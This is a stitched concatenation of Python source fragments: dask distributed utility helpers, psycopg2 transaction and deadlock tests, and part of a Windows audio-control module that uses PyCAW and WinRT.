        offset, length = start, end - start

    f.seek(offset)
    return f.read(length)
@contextmanager
def tmpfile(extension=""):
    """Yield a fresh temporary filename; the path does not exist on entry.

    The path is removed on exit even when the ``with`` body raises.  The
    previous version ran its cleanup after a bare ``yield``, so any
    exception propagating out of the block skipped cleanup and leaked the
    file — the ``try/finally`` fixes that.
    """
    extension = "." + extension.lstrip(".")
    handle, filename = tempfile.mkstemp(extension)
    os.close(handle)
    os.remove(filename)

    try:
        yield filename
    finally:
        if os.path.exists(filename):
            try:
                if os.path.isdir(filename):
                    shutil.rmtree(filename)
                else:
                    os.remove(filename)
            except OSError:  # sometimes we can't remove a generated temp file
                pass
def ensure_bytes(s):
    """Attempt to turn `s` into bytes.

    Parameters
    ----------
    s : Any
        The object to be converted. Will correctly handled
        * str
        * bytes
        * objects implementing the buffer protocol (memoryview, ndarray, etc.)

    Returns
    -------
    b : bytes

    Raises
    ------
    TypeError
        When `s` cannot be converted

    Examples
    --------
    >>> ensure_bytes('123')
    b'123'
    >>> ensure_bytes(b'123')
    b'123'
    """
    if isinstance(s, bytes):
        return s
    encode = getattr(s, "encode", None)
    if encode is not None:
        return encode()
    try:
        return bytes(s)
    except Exception as e:
        raise TypeError(
            "Object %s is neither a bytes object nor has an encode method" % s
        ) from e
def divide_n_among_bins(n, bins):
    """Split integer *n* into parts proportional to the weights in *bins*.

    Fractional remainders carry over to later bins so the total stays n.

    >>> divide_n_among_bins(12, [1, 1])
    [6, 6]
    >>> divide_n_among_bins(12, [1, 2])
    [4, 8]
    >>> divide_n_among_bins(11, [1, 2, 1])
    [2, 6, 3]
    >>> divide_n_among_bins(11, [.1, .2, .1])
    [2, 6, 3]
    """
    total = sum(bins)
    remainder = 0.0
    shares = []
    for weight in bins:
        exact = n / total * weight + remainder
        whole, remainder = divmod(exact, 1)
        shares.append(int(whole))
    return shares
def mean(seq):
    """Arithmetic mean of the values in *seq* (consumed into a list)."""
    values = list(seq)
    total = sum(values)
    return total / len(values)
def open_port(host=""):
    """Return a probably-open port

    There is a chance that this port will be taken by the operating system soon
    after returning from this function.
    """
    # http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
    # Bind to port 0 to let the OS pick an ephemeral port, record it,
    # then release the socket.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, 0))
        s.listen(1)
        return s.getsockname()[1]
def import_file(path):
    """Loads modules for a file (.py, .zip, .egg)

    Returns the list of freshly (re)imported module objects.
    """
    directory, filename = os.path.split(path)
    name, ext = os.path.splitext(filename)
    names_to_import = []
    tmp_python_path = None

    if ext in (".py",):  # , '.pyc'):
        if directory not in sys.path:
            # Remember the directory so we can add it to sys.path just for
            # the duration of the import below.
            tmp_python_path = directory
        names_to_import.append(name)
        if ext == ".py":  # Ensure that no pyc file will be reused
            cache_file = cache_from_source(path)
            with suppress(OSError):
                os.remove(cache_file)
    if ext in (".egg", ".zip", ".pyz"):
        if path not in sys.path:
            sys.path.insert(0, path)
        # Import every top-level module found inside the archive.
        names = (mod_info.name for mod_info in pkgutil.iter_modules([path]))
        names_to_import.extend(names)

    loaded = []
    if not names_to_import:
        logger.warning("Found nothing to import from %s", filename)
    else:
        importlib.invalidate_caches()
        if tmp_python_path is not None:
            sys.path.insert(0, tmp_python_path)
        try:
            for name in names_to_import:
                logger.info("Reload module %s from %s file", name, ext)
                # reload() so a module already imported under this name
                # picks up the new code from disk.
                loaded.append(importlib.reload(importlib.import_module(name)))
        finally:
            if tmp_python_path is not None:
                sys.path.remove(tmp_python_path)
    return loaded
class itemgetter:
    """A picklable itemgetter.

    Unlike ``operator.itemgetter``, instances survive pickling because the
    index is stored as a plain attribute and rebuilt via ``__reduce__``.

    Examples
    --------
    >>> data = [0, 1, 2]
    >>> get_1 = itemgetter(1)
    >>> get_1(data)
    1
    """

    __slots__ = ("index",)

    def __init__(self, index):
        self.index = index

    def __call__(self, x):
        return x[self.index]

    def __reduce__(self):
        # Rebuild from (class, (index,)) — works despite __slots__.
        return (itemgetter, (self.index,))
def asciitable(columns, rows):
    """Formats an ascii table for given columns and rows.

    Parameters
    ----------
    columns : list
        The column names
    rows : list of tuples
        The rows in the table. Each tuple must be the same length as
        ``columns``.
    """
    str_rows = [tuple(str(cell) for cell in row) for row in rows]
    str_cols = tuple(str(name) for name in columns)
    # Column width = widest cell or header in that column.
    widths = tuple(
        max(max(map(len, cells)), len(name))
        for cells, name in zip(zip(*str_rows), str_cols)
    )
    template = ("|" + (" %%-%ds |" * len(str_cols))) % widths
    divider = "+%s+" % "+".join("-" * (w + 2) for w in widths)
    body = "\n".join(template % row for row in str_rows)
    return "\n".join([divider, template % str_cols, divider, body, divider])
def nbytes(frame, _bytes_like=(bytes, bytearray)):
    """Number of bytes of a frame or memoryview"""
    if isinstance(frame, _bytes_like):
        return len(frame)
    # Buffer-like objects (memoryview, ndarray, ...) expose .nbytes;
    # fall back to len() for anything else.
    try:
        return frame.nbytes
    except AttributeError:
        return len(frame)
def is_writeable(frame):
    """
    Check whether frame is writeable

    Will return ``True`` if writeable, ``False`` if readonly, and
    ``None`` if undetermined (object has no buffer interface).
    """
    try:
        view = memoryview(frame)
    except TypeError:
        return None
    return not view.readonly
@contextmanager
def time_warn(duration, text):
    """Print a "TIME WARNING" line if the block takes longer than *duration* s."""
    started = time()
    yield
    elapsed = time() - started
    if elapsed > duration:
        print("TIME WARNING", text, elapsed)
def deprecated(*, version_removed: str = None):
    """Decorator to mark a function as deprecated

    Parameters
    ----------
    version_removed : str, optional
        If specified, include the version in which the deprecated function
        will be removed. Defaults to "a future release".
    """

    def decorator(func):
        tail = (
            f" version {version_removed}"
            if version_removed is not None
            else " a future release"
        )
        msg = f"{funcname(func)} is deprecated and will be removed in" + tail

        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            warnings.warn(msg, DeprecationWarning, stacklevel=2)
            return func(*args, **kwargs)

        return wrapper

    return decorator
def json_load_robust(fn, load=json.load):
    """Reads a JSON file from disk that may be being written as we read

    Blocks until *fn* exists, then retries up to 10 times on invalid or
    empty content (races with a concurrent writer), sleeping briefly
    between attempts.  Returns None if no truthy payload ever appears.
    """
    while not os.path.exists(fn):
        sleep(0.01)
    for _attempt in range(10):
        try:
            with open(fn) as f:
                data = load(f)
            if data:
                return data
        except (ValueError, KeyError):  # race with writing process
            pass
        sleep(0.1)
class DequeHandler(logging.Handler):
    """A logging.Handler that records records into a deque"""

    # Weak registry of live handlers so clear_all_instances can reach them
    # without keeping them alive.
    _instances = weakref.WeakSet()

    def __init__(self, *args, n=10000, **kwargs):
        self.deque = deque(maxlen=n)
        super().__init__(*args, **kwargs)
        self._instances.add(self)

    def emit(self, record):
        # Old records fall off the left automatically once maxlen is hit.
        self.deque.append(record)

    def clear(self):
        """
        Clear internal storage.
        """
        self.deque.clear()

    @classmethod
    def clear_all_instances(cls):
        """
        Clear the internal storage of all live DequeHandlers.
        """
        for handler in list(cls._instances):
            handler.clear()
def reset_logger_locks():
    """Recreate the lock of every registered logging handler.

    Handler locks don't survive a fork event; see
    https://github.com/dask/distributed/issues/1491
    """
    for logger_name in logging.Logger.manager.loggerDict:
        for handler in logging.getLogger(logger_name).handlers:
            handler.createLock()
# Decide whether to install a thread-friendly asyncio event loop policy.
# Skipped when running as a Jupyter server extension (the server owns the
# loop) or inside an IPython kernel that has no running loop.
is_server_extension = False
if "notebook" in sys.modules:
    import traitlets
    from notebook.notebookapp import NotebookApp

    is_server_extension = traitlets.config.Application.initialized() and isinstance(
        traitlets.config.Application.instance(), NotebookApp
    )

if not is_server_extension:
    is_kernel_and_no_running_loop = False

    if is_kernel():
        try:
            asyncio.get_running_loop()
        except RuntimeError:
            is_kernel_and_no_running_loop = True

    if not is_kernel_and_no_running_loop:
        # TODO: Use tornado's AnyThreadEventLoopPolicy, instead of class below,
        # once tornado > 6.0.3 is available.
        if WINDOWS and hasattr(asyncio, "WindowsSelectorEventLoopPolicy"):
            # WindowsProactorEventLoopPolicy is not compatible with tornado 6
            # fallback to the pre-3.8 default of Selector
            # https://github.com/tornadoweb/tornado/issues/2608
            BaseEventLoopPolicy = asyncio.WindowsSelectorEventLoopPolicy
        else:
            BaseEventLoopPolicy = asyncio.DefaultEventLoopPolicy

        class AnyThreadEventLoopPolicy(BaseEventLoopPolicy):
            # Like the base policy, but threads without an event loop get a
            # fresh one instead of a RuntimeError/AssertionError.
            def get_event_loop(self):
                try:
                    return super().get_event_loop()
                except (RuntimeError, AssertionError):
                    loop = self.new_event_loop()
                    self.set_event_loop(loop)
                    return loop

        asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
@functools.lru_cache(1000)
def has_keyword(func, keyword):
    """True when callable *func* accepts a parameter named *keyword* (cached)."""
    parameters = inspect.signature(func).parameters
    return keyword in parameters
@functools.lru_cache(1000)
def command_has_keyword(cmd, k):
    """True when click command *cmd* (object or importable module name)
    declares an option named *k* (cached)."""
    if cmd is None:
        return False
    if isinstance(cmd, str):
        try:
            from importlib import import_module

            cmd = import_module(cmd)
        except ImportError:
            raise ImportError("Module for command %s is not available" % cmd)
        if isinstance(getattr(cmd, "main"), click.core.Command):
            # The module exposes its click entry point as `main`.
            cmd = cmd.main
    if isinstance(cmd, click.core.Command):
        option_names = {
            p.human_readable_name
            for p in cmd.params
            if isinstance(p, click.core.Option)
        }
        return k in option_names
    return False
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = [
    "#440154",
    "#471669",
    "#472A79",
    "#433C84",
    "#3C4D8A",
    "#355D8C",
    "#2E6C8E",
    "#287A8E",
    "#23898D",
    "#1E978A",
    "#20A585",
    "#2EB27C",
    "#45BF6F",
    "#64CB5D",
    "#88D547",
    "#AFDC2E",
    "#D7E219",
    "#FDE724",
]


@toolz.memoize
def color_of(x, palette=palette):
    """Deterministically map *x* to a palette color via an md5 digest."""
    digest = md5(str(x).encode())
    index = int(digest.hexdigest()[:8], 16)
    return palette[index % len(palette)]
@functools.lru_cache(None)
def iscoroutinefunction(f):
    """True for native coroutine functions and tornado gen-coroutines (cached)."""
    return inspect.iscoroutinefunction(f) or gen.is_coroutine_function(f)
@contextmanager
def warn_on_duration(duration, msg):
    """Emit *msg* as a warning if the block outlasts *duration* (timedelta spec)."""
    begin = time()
    yield
    if time() - begin > parse_timedelta(duration):
        warnings.warn(msg, stacklevel=2)
def typename(typ):
    """Return name of type

    Falls back to ``str(typ)`` for objects without module/name attributes.

    Examples
    --------
    >>> from distributed import Scheduler
    >>> typename(Scheduler)
    'distributed.scheduler.Scheduler'
    """
    try:
        return f"{typ.__module__}.{typ.__name__}"
    except AttributeError:
        return str(typ)
def format_dashboard_link(host, port):
    """Fill the configured dashboard link template with scheme/host/port."""
    template = dask.config.get("distributed.dashboard.link")
    scheme = (
        "https"
        if dask.config.get("distributed.scheduler.dashboard.tls.cert")
        else "http"
    )
    # Environment variables may also appear as template fields.
    context = toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port))
    return template.format(**context)
def parse_ports(port):
    """Parse input port information into list of ports

    Parameters
    ----------
    port : int, str, None
        Input port or ports. Can be an integer like 8787, a string for a
        single port like "8787", a string for a sequential range of ports like
        "8000:8200", or None.

    Returns
    -------
    ports : list
        List of ports

    Examples
    --------
    >>> parse_ports(8787)
    [8787]
    >>> parse_ports("8787")
    [8787]
    >>> parse_ports("8787:8790")
    [8787, 8788, 8789, 8790]
    >>> parse_ports(None)
    [None]
    """
    if isinstance(port, str) and ":" not in port:
        port = int(port)

    if port is None or isinstance(port, int):
        return [port]

    # Remaining case: a "start:stop" range string.
    first, last = map(int, port.split(":"))
    if last <= first:
        raise ValueError(
            "When specifying a range of ports like port_start:port_stop, "
            "port_stop must be greater than port_start, but got "
            f"port_start={first} and port_stop={last}"
        )
    return list(range(first, last + 1))
is_coroutine_function = iscoroutinefunction
class Log(str):
    """A container for logs"""

    def _repr_html_(self):
        # Escape the (right-stripped) log text so it renders literally.
        escaped = html.escape(self.rstrip())
        return f"<pre><code>\n{escaped}\n</code></pre>"
class Logs(dict):
    """A container for multiple logs"""

    def _repr_html_(self):
        sections = []
        # Render one collapsible <details> section per log, sorted by title.
        for title, log in sorted(self.items()):
            sections.append(
                "<details>\n"
                "<summary style='display:list-item'>{title}</summary>\n"
                "{log}\n"
                "</details>".format(title=title, log=log._repr_html_())
            )
        return "\n".join(sections)
def cli_keywords(d: dict, cls=None, cmd=None):
    """Convert a kwargs dictionary into a list of CLI keywords

    Parameters
    ----------
    d : dict
        The keywords to convert
    cls : callable
        The callable that consumes these terms to check them for validity
    cmd : string or object
        A string with the name of a module, or the module containing a
        click-generated command with a "main" function, or the function itself.

    Examples
    --------
    >>> cli_keywords({"x": 123, "save_file": "foo.txt"})
    ['--x', '123', '--save-file', 'foo.txt']
    """
    if cls or cmd:
        for k in d:
            if has_keyword(cls, k) or command_has_keyword(cmd, k):
                continue
            if cls and cmd:
                raise ValueError(
                    "Neither class %s or module %s support keyword %s"
                    % (typename(cls), typename(cmd), k)
                )
            if cls:
                raise ValueError(
                    "Class %s does not support keyword %s" % (typename(cls), k)
                )
            raise ValueError(
                "Module %s does not support keyword %s" % (typename(cmd), k)
            )

    def fmt(v):
        # Quote values containing spaces (unless they already carry quotes).
        text = str(v)
        if " " in text and "'" not in text and '"' not in text:
            text = '"' + text + '"'
        return text

    out = []
    for k, v in d.items():
        out.extend(["--" + k.replace("_", "-"), fmt(v)])
    return out
def is_valid_xml(text):
    """Parse *text* as XML: True on success, raises ParseError on bad input."""
    parsed = xml.etree.ElementTree.fromstring(text)
    return parsed is not None
# Single-threaded executor used by offload() to push blocking work off the
# event loop; shut down automatically when the executor is garbage collected.
_offload_executor = ThreadPoolExecutor(max_workers=1, thread_name_prefix="Dask-Offload")
weakref.finalize(_offload_executor, _offload_executor.shutdown)
def import_term(name: str):
    """Return the fully qualified term

    Imports the object at dotted path *name*; a bare module name returns
    the module itself.

    Examples
    --------
    >>> import_term("math.sin")  # doctest: +SKIP
    <function math.sin(x, /)>
    """
    if "." not in name:
        return importlib.import_module(name)
    module_name, _, attr_name = name.rpartition(".")
    module = importlib.import_module(module_name)
    return getattr(module, attr_name)
async def offload(fn, *args, **kwargs):
    """Run ``fn(*args, **kwargs)`` on the offload thread and await the result.

    Uses ``asyncio.get_running_loop()``: we are inside a coroutine so a
    running loop is guaranteed, and ``get_event_loop()`` is deprecated for
    this use in modern Python.
    """
    loop = asyncio.get_running_loop()
    return await loop.run_in_executor(_offload_executor, lambda: fn(*args, **kwargs))
class EmptyContext:
    """A no-op context manager, usable in both sync and async ``with``."""

    def __enter__(self):
        return None

    def __exit__(self, *args):
        return None

    async def __aenter__(self):
        return None

    async def __aexit__(self, *args):
        return None


# Shared reusable instance.
empty_context = EmptyContext()
class LRU(UserDict):
    """Limited size mapping, evicting the least recently looked-up key when full"""

    def __init__(self, maxsize):
        super().__init__()
        # Ordered storage: leftmost entry is the least recently accessed.
        self.data = OrderedDict()
        self.maxsize = maxsize

    def __getitem__(self, key):
        result = super().__getitem__(key)
        # A successful lookup refreshes the key's recency.
        self.data.move_to_end(key)
        return result

    def __setitem__(self, key, value):
        if len(self) >= self.maxsize:
            # Evict the stalest (leftmost) entry before inserting.
            self.data.popitem(last=False)
        super().__setitem__(key, value)
def clean_dashboard_address(addr, default_listen_ip=""):
    """Normalize a dashboard address spec to ``{'address': ..., 'port': ...}``.

    Examples
    --------
    >>> clean_dashboard_address(8787)
    {'address': '', 'port': 8787}
    >>> clean_dashboard_address(":8787")
    {'address': '', 'port': 8787}
    >>> clean_dashboard_address("8787")
    {'address': '', 'port': 8787}
    >>> clean_dashboard_address("foo:8787")
    {'address': 'foo', 'port': 8787}
    """
    if default_listen_ip == "0.0.0.0":
        default_listen_ip = ""  # for IPV6

    # Plain port numbers (possibly given as strings) become ints.
    with suppress(TypeError, ValueError):
        addr = int(addr)

    if isinstance(addr, str):
        addr = addr.split(":")

    if isinstance(addr, (tuple, list)):
        if len(addr) == 2:
            host, port = addr[0], int(addr[1])
        elif len(addr) == 1:
            host, port = addr[0], 0
        else:
            raise ValueError(addr)
    elif isinstance(addr, int):
        host, port = default_listen_ip, addr

    return {"address": host, "port": port}
|
test_transaction.py | #!/usr/bin/env python
import threading
import unittest
import psycopg2
from psycopg2.extensions import (
ISOLATION_LEVEL_SERIALIZABLE, STATUS_BEGIN, STATUS_READY)
import tests
class TransactionTests(unittest.TestCase):
    """Commit/rollback state transitions on a SERIALIZABLE connection."""

    def setUp(self):
        self.conn = psycopg2.connect(tests.dsn)
        self.conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE)
        curs = self.conn.cursor()
        curs.execute('''
            CREATE TEMPORARY TABLE table1 (
              id int PRIMARY KEY
            )''')
        # The constraint is set to deferrable for the commit_failed test
        curs.execute('''
            CREATE TEMPORARY TABLE table2 (
              id int PRIMARY KEY,
              table1_id int,
              CONSTRAINT table2__table1_id__fk
                FOREIGN KEY (table1_id) REFERENCES table1(id) DEFERRABLE)''')
        curs.execute('INSERT INTO table1 VALUES (1)')
        curs.execute('INSERT INTO table2 VALUES (1, 1)')
        self.conn.commit()

    def tearDown(self):
        self.conn.close()

    def test_rollback(self):
        # Test that rollback undoes changes
        curs = self.conn.cursor()
        curs.execute('INSERT INTO table2 VALUES (2, 1)')
        # Rollback takes us from BEGIN state to READY state
        self.assertEqual(self.conn.status, STATUS_BEGIN)
        self.conn.rollback()
        self.assertEqual(self.conn.status, STATUS_READY)
        curs.execute('SELECT id, table1_id FROM table2 WHERE id = 2')
        self.assertEqual(curs.fetchall(), [])

    def test_commit(self):
        # Test that commit stores changes
        curs = self.conn.cursor()
        curs.execute('INSERT INTO table2 VALUES (2, 1)')
        # Commit takes us from BEGIN state to READY state
        self.assertEqual(self.conn.status, STATUS_BEGIN)
        self.conn.commit()
        self.assertEqual(self.conn.status, STATUS_READY)
        # Now rollback and show that the new record is still there:
        self.conn.rollback()
        curs.execute('SELECT id, table1_id FROM table2 WHERE id = 2')
        self.assertEqual(curs.fetchall(), [(2, 1)])

    def test_failed_commit(self):
        # Test that we can recover from a failed commit.
        # We use a deferred constraint to cause a failure on commit.
        curs = self.conn.cursor()
        curs.execute('SET CONSTRAINTS table2__table1_id__fk DEFERRED')
        curs.execute('INSERT INTO table2 VALUES (2, 42)')
        # The commit should fail, and move the cursor back to READY state
        self.assertEqual(self.conn.status, STATUS_BEGIN)
        self.assertRaises(psycopg2.IntegrityError, self.conn.commit)
        self.assertEqual(self.conn.status, STATUS_READY)
        # The connection should be ready to use for the next transaction:
        curs.execute('SELECT 1')
        self.assertEqual(curs.fetchone()[0], 1)
class DeadlockSerializationTests(unittest.TestCase):
    """Test deadlock and serialization failure errors.

    Fix: the exception clauses used the Python-2-only form
    ``except psycopg2.DatabaseError, exc:`` which is a SyntaxError on
    Python 3; ``except ... as exc:`` works on Python 2.6+ and Python 3.
    """

    def connect(self):
        # Each concurrent actor gets its own SERIALIZABLE connection.
        conn = psycopg2.connect(tests.dsn)
        conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE)
        return conn

    def setUp(self):
        self.conn = self.connect()
        curs = self.conn.cursor()
        # Drop table if it already exists
        try:
            curs.execute("DROP TABLE table1")
            self.conn.commit()
        except psycopg2.DatabaseError:
            self.conn.rollback()
        try:
            curs.execute("DROP TABLE table2")
            self.conn.commit()
        except psycopg2.DatabaseError:
            self.conn.rollback()
        # Create sample data
        curs.execute("""
            CREATE TABLE table1 (
              id int PRIMARY KEY,
              name text)
            """)
        curs.execute("INSERT INTO table1 VALUES (1, 'hello')")
        curs.execute("CREATE TABLE table2 (id int PRIMARY KEY)")
        self.conn.commit()

    def tearDown(self):
        curs = self.conn.cursor()
        curs.execute("DROP TABLE table1")
        curs.execute("DROP TABLE table2")
        self.conn.commit()
        self.conn.close()

    def test_deadlock(self):
        self.thread1_error = self.thread2_error = None
        step1 = threading.Event()
        step2 = threading.Event()

        def task1():
            try:
                conn = self.connect()
                curs = conn.cursor()
                curs.execute("LOCK table1 IN ACCESS EXCLUSIVE MODE")
                step1.set()
                step2.wait()
                curs.execute("LOCK table2 IN ACCESS EXCLUSIVE MODE")
            except psycopg2.DatabaseError as exc:
                self.thread1_error = exc
                step1.set()
            conn.close()

        def task2():
            try:
                conn = self.connect()
                curs = conn.cursor()
                step1.wait()
                curs.execute("LOCK table2 IN ACCESS EXCLUSIVE MODE")
                step2.set()
                curs.execute("LOCK table1 IN ACCESS EXCLUSIVE MODE")
            except psycopg2.DatabaseError as exc:
                self.thread2_error = exc
                step2.set()
            conn.close()

        # Run the threads in parallel.  The "step1" and "step2" events
        # ensure that the two transactions overlap.
        thread1 = threading.Thread(target=task1)
        thread2 = threading.Thread(target=task2)
        thread1.start()
        thread2.start()
        thread1.join()
        thread2.join()

        # Exactly one of the threads should have failed with
        # TransactionRollbackError:
        self.assertFalse(self.thread1_error and self.thread2_error)
        error = self.thread1_error or self.thread2_error
        self.assertTrue(isinstance(
            error, psycopg2.extensions.TransactionRollbackError))

    def test_serialisation_failure(self):
        self.thread1_error = self.thread2_error = None
        step1 = threading.Event()
        step2 = threading.Event()

        def task1():
            try:
                conn = self.connect()
                curs = conn.cursor()
                curs.execute("SELECT name FROM table1 WHERE id = 1")
                curs.fetchall()
                step1.set()
                step2.wait()
                curs.execute("UPDATE table1 SET name='task1' WHERE id = 1")
                conn.commit()
            except psycopg2.DatabaseError as exc:
                self.thread1_error = exc
                step1.set()
            conn.close()

        def task2():
            try:
                conn = self.connect()
                curs = conn.cursor()
                step1.wait()
                curs.execute("UPDATE table1 SET name='task2' WHERE id = 1")
                conn.commit()
            except psycopg2.DatabaseError as exc:
                self.thread2_error = exc
                step2.set()
            conn.close()

        # Run the threads in parallel.  The "step1" and "step2" events
        # ensure that the two transactions overlap.
        thread1 = threading.Thread(target=task1)
        thread2 = threading.Thread(target=task2)
        thread1.start()
        thread2.start()
        thread1.join()
        thread2.join()

        # Exactly one of the threads should have failed with
        # TransactionRollbackError:
        self.assertFalse(self.thread1_error and self.thread2_error)
        error = self.thread1_error or self.thread2_error
        self.assertTrue(isinstance(
            error, psycopg2.extensions.TransactionRollbackError))
class QueryCancelationTests(unittest.TestCase):
    """Tests for query cancelation."""
    def setUp(self):
        # Serializable isolation, consistent with the other tests in this module.
        self.conn = psycopg2.connect(tests.dsn)
        self.conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE)
    def test_statement_timeout(self):
        """A statement exceeding statement_timeout raises QueryCanceledError."""
        curs = self.conn.cursor()
        # Set a low statement timeout, then sleep for a longer period.
        curs.execute('SET statement_timeout TO 10')
        self.assertRaises(psycopg2.extensions.QueryCanceledError,
            curs.execute, 'SELECT pg_sleep(50)')
def test_suite():
    """Return a suite containing every test defined in this module."""
    loader = unittest.TestLoader()
    return loader.loadTestsFromName(__name__)
|
Audio.py | '''
Audio player and controller from Automator
==========================================
github: https://github.com/Davide255/Automator
module from core.audio
See the Audio class for docs
MIT License
Copyright (c) 2022 Davide
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import time, os
#Audio Requirements
from ctypes import POINTER, cast
from os import environ
class Audio:
'''
Class for controlling playing audios and queues
===============================================
Simples:
Playing audio file:
>>> from Audio import Audio
>>> Audio().play_audio('path\\to\\file.ext')
Controlling Audio in your system:
>>> from Audio import Audio
>>> controller = Audio.Controller()
>>> controller.setMasterLevel(60) #volume will be set to 60%
Advanced:
Real time control:
>>> from Audio import Audio
>>> Audio().play_audio('path\\to\\file.ext', True) #True means that this
instruction will be executed
in a separate Thread
>>> while True:
>>> command = input('Audio %s is playing:\nP) Play/Pause\nQ) Quit\n\nWhat did you choose? ')
>>> if command in ('p', 'P'):
>>> Audio.play_pause()
>>> elif command in ('q', 'Q'):
>>> Audio.quit()
>>> break
>>> else: print('Unknown command')
>>> print ("\033[A \033[A") #clean line
Play from Youtube audio:
>>> from Audio import Audio
>>> from AudioHelpers import Youtube
>>> Audio.from_stream(Youtube('url').get_stream())
>>> while Audio.is_playing():
>>> pass
Mute/Unmute a single process:
>>> from Audio import Audio
>>> from core.process import getallprocs
>>> controller = Audio.Controller()
>>> for p in getallprocs(name=False):
'''
events = ('media_ended', 'source_changed', 'volume_changed', 'playback_state_changed', 'position_changed')
class Controller:
class Process:
    """Per-process audio session control (mute/unmute/volume) via PyCAW.

    The target session is matched against `process_name`.  NOTE(review):
    mute()/unmute() use a substring match while get_volume()/set_volume()
    require an exact process-name match -- confirm this asymmetry is intended.
    """
    def __init__(self, process_name) -> None:
        if process_name != None:
            self.process_name = process_name
    def mute(self):
        """Mute every session whose process name contains process_name."""
        from libs.PyCAW import AudioUtilities
        import logging as Logger
        sessions = AudioUtilities.GetAllSessions()
        for session in sessions:
            interface = session.SimpleAudioVolume
            if session.Process and self.process_name in session.Process.name():
                interface.SetMute(1, None)
                # BUG FIX: logging takes one format string plus lazy %-args;
                # the old comma-separated call raised a formatting error.
                # (Also removed a leftover `print(dir(interface))` debug line.)
                Logger.info('Audio: %s has been muted.', self.process_name)
    def unmute(self):
        """Unmute every session whose process name contains process_name."""
        from libs.PyCAW import AudioUtilities
        import logging as Logger
        sessions = AudioUtilities.GetAllSessions()
        for session in sessions:
            interface = session.SimpleAudioVolume
            if session.Process and self.process_name in session.Process.name():
                interface.SetMute(0, None)
                Logger.info('Audio: %s has been unmuted.', self.process_name)
    def get_volume(self):
        """Return the session volume as an integer percentage, or None if no
        session matches."""
        from libs.PyCAW import AudioUtilities
        import logging as Logger
        sessions = AudioUtilities.GetAllSessions()
        for session in sessions:
            interface = session.SimpleAudioVolume
            if session.Process and session.Process.name() == self.process_name:
                # BUG FIX: scale the 0.0-1.0 scalar with `* 100`; the old
                # `** 100` exponentiation collapsed every volume to ~0 or 1.
                level = round(interface.GetMasterVolume() * 100)
                Logger.info('Audio: Volume: %s%%', level)
                return level
    def set_volume(self, volume):
        """Set the session volume from a 0-100 percentage; True on success."""
        from libs.PyCAW import AudioUtilities
        import logging as Logger
        sessions = AudioUtilities.GetAllSessions()
        for session in sessions:
            interface = session.SimpleAudioVolume
            if session.Process and session.Process.name() == self.process_name:
                Logger.info('Audio: Volume: %s%%', round(interface.GetMasterVolume() * 100))
                return not bool(interface.SetMasterVolume(volume / 100, None))
def get_all_sessions(self):
    """Return the process names of all active audio sessions."""
    from libs.PyCAW import AudioUtilities
    return [session.Process.name()
            for session in AudioUtilities.GetAllSessions()
            if session.Process]
def setMasterLevel(self, level):
    """Set the system master volume.  `level` is a 0-100 percentage (int)
    or a 0.0-1.0 scalar (float)."""
    # Integer percentages are scaled down to the 0.0-1.0 scalar range.
    if isinstance(level, int):
        level = level/100
    # NOTE(review): this extra /10 only fires for float inputs > 1.0 and
    # does not fully normalise values >= 100 -- confirm intent.
    if level > 1.0:
        level = level/10
    from comtypes import CLSCTX_ALL, CoUninitialize
    from libs.PyCAW import AudioUtilities, IAudioEndpointVolume
    # Activate the endpoint-volume COM interface on the default speakers.
    interface = AudioUtilities.GetSpeakers().Activate(IAudioEndpointVolume._iid_, CLSCTX_ALL, None)
    volume = cast(interface, POINTER(IAudioEndpointVolume))
    volume.SetMasterVolumeLevelScalar(level, None)
    CoUninitialize()
async def async_initiallize(self):
    """(Re)create the shared WinRT MediaPlayer and wire up its events.

    The player is stored as a class attribute (Audio.mediaplayer) so every
    Audio instance controls the same underlying player.
    """
    from winrt.windows.media.playback import MediaPlayer
    # Drop any previous player before creating a fresh one.
    if hasattr(Audio, 'mediaplayer'):
        del Audio.mediaplayer
    Audio.mediaplayer = MediaPlayer()
    # Forward player events to the (re-bindable, see bind()) Audio.* handlers.
    Audio.mediaplayer.add_media_ended(Audio.media_ended)
    Audio.mediaplayer.add_source_changed(Audio.source_changed)
    Audio.mediaplayer.add_volume_changed(Audio.volume_changed)
    Audio.mediaplayer.playback_session.add_playback_state_changed(Audio.playback_state_changed)
    Audio.mediaplayer.playback_session.add_position_changed(Audio.position_changed)
def from_stream(stream_obj):
    """Start playback from a stream object (e.g. AudioHelpers.Youtube stream).

    NOTE(review): defined without `self` and invoked as Audio.from_stream(...)
    per the class docstring -- effectively a static method.
    """
    import asyncio
    asyncio.run(Audio().async_initiallize())
    from winrt.windows.foundation import TimeSpan
    from winrt.windows.media.playback import MediaPlaybackItem
    Audio._stream = stream_obj
    item = MediaPlaybackItem(stream_obj.stream)
    Audio.mediaplayer.source = item
    # stream length is in seconds; TimeSpan counts 100 ns ticks.
    Audio.duration = TimeSpan()
    Audio.duration.duration = stream_obj.data.length * 10000000
    Audio.title = stream_obj.data.title
    Audio._update_display_properties(item)
    Audio.play()
    # Background watcher that fires media_ended once the playback position
    # reaches the stream's total duration (see stream_end_handler).
    from threading import Thread
    Thread(target=Audio.stream_end_handler, daemon=True).start()
def get_stream(self):
    """Return the active stream object, or None when nothing is streaming."""
